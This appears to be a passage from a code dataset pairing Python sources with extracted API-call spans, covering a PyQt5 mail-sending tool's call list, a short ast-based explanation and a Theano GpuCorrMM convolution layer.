(7309, 7315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7436, 7447), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7445, 7447), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7473, 7485), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (7483, 7485), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7618, 7627), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7625, 7627), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7654, 7663), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7661, 7663), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7793, 7806), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7804, 7806), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7836, 7849), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7847, 7849), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8065, 8076), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ([], {}), '()\n', (8074, 8076), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8104, 8120), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ([], {}), '()\n', (8118, 8120), False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((8275, 8292), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""清除"""'], {}), "('清除')\n", (8286, 8292), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8390, 8407), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""讀取"""'], {}), "('讀取')\n", (8401, 8407), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8503, 
8520), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (8514, 8520), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8629, 8643), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (8641, 8643), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8732, 8743), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8741, 8743), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8772, 8783), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (8781, 8783), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8868, 8885), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (8879, 8885), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15450, 15518), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (15477, 15518), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15605, 15676), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')\n", (15632, 15676), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15762, 15838), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Word Files (*.doc *.docx)"""'], {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')\n", (15789, 15838), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15925, 16011), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Annex Files (*.jpg *.png *.zip)"""'], {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')\n", (15952, 16011), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, 
QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18931, 18999), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (18958, 18999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19081, 19102), 'mylibrary.genmail.get_msg', 'gm.get_msg', (['file_name'], {}), '(file_name)\n', (19091, 19102), True, 'import mylibrary.genmail as gm\n'), ((22664, 22687), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ([], {}), '()\n', (22685, 22687), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1069, 1103), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (1101, 1103), False, 'import qdarkstyle, sys\n'), ((1141, 1154), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""收件人"""'], {}), "('收件人')\n", (1147, 1154), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2107, 2141), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (2139, 2141), False, 'import qdarkstyle, sys\n'), ((5815, 5842), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ([], {}), '()\n', (5840, 5842), False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((11920, 11933), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11926, 11933), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((12968, 12982), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""查詢 :"""'], {}), "('查詢 :')\n", (12974, 12982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13447, 13471), 'copy.deepcopy', 'deepcopy', (['self.data_logs'], {}), '(self.data_logs)\n', (13455, 13471), False, 'from copy import deepcopy\n'), ((15075, 15141), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (15098, 15141), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17899, 17969), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""請確認有無 SMTP 資料!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\n", (17918, 17969), False, 
'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19891, 19963), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.eml)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.eml)')\n", (19918, 19963), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20123, 20189), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (20146, 20189), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22463, 22528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""缺少資料"""', '"""請確認是否有資料可以下載"""', 'QMessageBox.Ok'], {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)\n", (22482, 22528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((9197, 9210), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (9203, 9210), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((10310, 10323), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (10316, 10323), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((11182, 11195), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['label'], {}), '(label)\n', (11188, 11195), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((13358, 13368), 'server.database.Database', 'Database', ([], {}), '()\n', (13366, 13368), False, 'from server.database import Database\n'), ((14464, 14528), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""資料庫連結失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\n", (14483, 14528), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15172, 15233), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (15191, 15233), False, 'from 
PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((16755, 16763), 'server.client.Client', 'Client', ([], {}), '()\n', (16761, 16763), False, 'from server.client import Client\n'), ((16933, 17001), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""排程設定成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\n", (16956, 17001), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17326, 17426), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (['eml_type', 'eml_file', 'user_group', 'mail_excel', 'sm', 'db'], {'annex': 'annex_file', 'url': 'url'}), '(eml_type, eml_file, user_group, mail_excel, sm, db, annex=\n annex_file, url=url)\n', (17342, 17426), False, 'from GenAndSendMail import insert_send_mail\n'), ((17519, 17587), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (17542, 17587), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17616, 17679), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (17635, 17679), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18773, 18836), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""信件寄出失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n", (18792, 18836), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((19762, 19798), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html', 'annex_file'], {}), '(header, html, annex_file)\n', (19772, 19798), True, 'import mylibrary.genmail as gm\n'), ((19838, 19862), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html'], {}), '(header, html)\n', (19848, 19862), True, 'import mylibrary.genmail as gm\n'), ((20036, 20064), 'email.generator.Generator', 'generator.Generator', (['outfile'], {}), '(outfile)\n', (20055, 20064), False, 'from email import generator\n'), ((20218, 20279), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (20237, 20279), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, 
QHeaderView\n'), ((22015, 22088), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '"""另存為..."""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')\n", (22042, 22088), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22172, 22202), 'pandas.DataFrame', 'DataFrame', (['self.data_temp_logs'], {}), '(self.data_temp_logs)\n', (22181, 22202), False, 'from pandas import DataFrame\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""儲存成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\n', (17154, 17156), False, 'from server.sendmail import Smtp\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\n', (17306, 17308), False, 'from server.database import Database\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Warning!"""', "('信件寄出成功!\\nWaning: ' + error)", 'QMessageBox.Ok'], {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)\n", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '"""Success!"""', '"""信件寄出成功!"""', 'QMessageBox.Ok'], {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '"""Failed!"""', '"""儲存失敗!"""', 'QMessageBox.Ok'], {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((14992, 
15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')]
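The tuples above pair character spans in the source string with the qualified name of the call and the import statement that provides it. The tool that produced these records is not shown here, and the exact field layout is inferred from the examples, so the following stdlib-only sketch is illustrative rather than a reimplementation of the original pipeline; it shows how comparable call-site spans can be recovered from a source string:

# Minimal sketch (assumed schema, Python 3.8+ for end offsets). Offsets are
# exact for ASCII sources; col_offset is a UTF-8 byte offset in general.
import ast

def extract_call_spans(source: str):
    """Yield (start, end, callee_text) for every call expression in `source`."""
    tree = ast.parse(source)
    # Pre-compute where each line starts so (lineno, col) pairs can be turned
    # into flat character positions comparable to the spans in the record above.
    line_starts = [0]
    for line in source.splitlines(keepends=True):
        line_starts.append(line_starts[-1] + len(line))

    def flat(lineno, col):
        return line_starts[lineno - 1] + col

    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            start = flat(node.lineno, node.col_offset)
            end = flat(node.end_lineno, node.end_col_offset)
            yield start, end, ast.get_source_segment(source, node.func)

# Example on a two-line snippet:
sample = "import numpy as np\nxs = np.linspace(0, 30, 217)\n"
for start, end, callee in extract_call_spans(sample):
    print(start, end, callee)  # span of the np.linspace(...) call and its callee text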
""" GpuCorrMM-based convolutional layers """ import numpy as np import theano import theano.tensor as T from theano.sandbox.cuda.basic_ops import gpu_contiguous from theano.sandbox.cuda.blas import GpuCorrMM from .. import init from .. import nonlinearities from . import base # base class for all layers that rely on GpuCorrMM directly class MMLayer(base.Layer): pass class Conv2DMMLayer(MMLayer): def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False, W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None, flip_filters=False): super(Conv2DMMLayer, self).__init__(input_layer) if nonlinearity is None: self.nonlinearity = nonlinearities.identity else: self.nonlinearity = nonlinearity self.num_filters = num_filters self.filter_size = filter_size self.strides = strides self.untie_biases = untie_biases self.flip_filters = flip_filters if border_mode is not None and pad is not None: raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.") elif border_mode is None and pad is None: # no option specified, default to valid mode self.pad = (0, 0) elif border_mode is not None: if border_mode == 'valid': self.pad = (0, 0) elif border_mode == 'full': self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1) elif border_mode == 'same': # only works for odd filter size, but the even filter size case is probably not worth supporting. self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2) else: raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode) else: self.pad = pad self.W = self.create_param(W, self.get_W_shape()) if b is None: self.b = None elif self.untie_biases: output_shape = self.get_output_shape() self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3])) else: self.b = self.create_param(b, (num_filters,)) self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad) def get_W_shape(self): num_input_channels = self.input_layer.get_output_shape()[1] return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1]) def get_params(self): return [self.W] + self.get_bias_params() def get_bias_params(self): return [self.b] if self.b is not None else [] def get_output_shape_for(self, input_shape): batch_size = input_shape[0] input_width, input_height = input_shape[2:4] output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1 output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1 return (batch_size, self.num_filters, output_width, output_height) def get_output_for(self, input, *args, **kwargs): filters = self.W if self.flip_filters: filters = filters[:, :, ::-1, ::-1] # flip width, height contiguous_filters = gpu_contiguous(filters) contiguous_input = gpu_contiguous(input) conved = self.corr_mm_op(contiguous_input, contiguous_filters) if self.b is None: activation = conved elif self.untie_biases: activation = conved + self.b.dimshuffle('x', 0, 1, 2) else: activation = conved + self.b.dimshuffle('x', 0, 'x', 'x') return self.nonlinearity(activation)
[ "theano.sandbox.cuda.basic_ops.gpu_contiguous", "theano.sandbox.cuda.blas.GpuCorrMM" ]
[((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')]
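The padding and output-shape arithmetic in the Conv2DMMLayer above is easy to check in isolation. Below is a minimal, framework-free sketch (plain Python, no Theano or GPU required) of the same formula used in get_output_shape_for, combined with the 'valid'/'full'/'same' padding choices from __init__; the helper name conv2d_output_shape is ours, not part of the original module.

def conv2d_output_shape(input_shape, num_filters, filter_size,
                        strides=(1, 1), border_mode='valid'):
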